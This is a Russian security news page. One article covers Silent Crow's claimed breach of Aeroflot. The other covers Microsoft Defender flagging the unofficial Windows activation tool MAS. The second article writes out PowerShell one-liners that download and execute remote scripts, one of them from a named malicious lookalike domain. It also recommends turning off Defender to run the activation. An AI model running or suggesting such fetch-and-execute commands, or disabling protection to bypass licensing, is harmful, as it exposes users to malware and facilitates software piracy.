Silent Crow взяла ответственность за атаку на Аэрофлот

Яков Шпунт 28 Июля 2025 - 11:16

Таргетированные атаки

...

Silent Crow взяла ответственность за атаку на Аэрофлот

Хактивистская кибергруппировка Silent Crow заявила об ответственности за масштабную атаку на информационные системы «Аэрофлота». По словам злоумышленников, им удалось получить доступ к 122 корпоративным системам авиакомпании, включая ключевые внутренние сервисы, данные сотрудников и клиентов. Об атаке стало известно утром 28 июля, и спустя 40 минут в сети появилось сообщение от самой группировки.

Сообщение от Silent Crow появилось менее чем через час после официальной информации о сбое в работе сервисов «Аэрофлота».

В нём утверждается, что злоумышленники находились внутри ИТ-инфраструктуры авиакомпании в течение года. За это время они якобы получили доступ к ERP и CRM-системам, сервисам бронирования билетов, внутреннему корпоративному порталу, системе управления электронной почтой и даже рабочим станциям топ-менеджеров компании.

Среди прочего Silent Crow заявляет о доступе к системе бронирования Sabre. Однако следует отметить, что её оператор ещё в марте 2022 года отключил «Аэрофлот» от этой платформы в рамках санкционных мер. Более того, с ноября 2024 года в России действует запрет на предоставление облачных сервисов компаниям из РФ со стороны иностранных провайдеров.

Также хактивисты утверждают, что им удалось выгрузить массивы данных из всех скомпрометированных систем. В список якобы попали записи аудиопереговоров, видеонаблюдение, а также персональные данные всех российских клиентов, когда-либо пользовавшихся услугами «Аэрофлота». Группировка анонсировала начало публикации этих данных в ближайшее время.

Кроме того, злоумышленники заявили об уничтожении информации с 7 000 серверов компании — как физических, так и виртуальных. По их словам, стерто 12 ТБ баз данных, 8 ТБ файлов с корпоративного портала и 2 ТБ содержимого почтовых ящиков.

Напомним, ранее Silent Crow брала на себя ответственность за утечку данных о закупках «Ростелекома» в январе 2025 года. Тогда же группировка заявила о компрометации базы данных «Росреестра», однако данный инцидент официально подтверждён не был.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.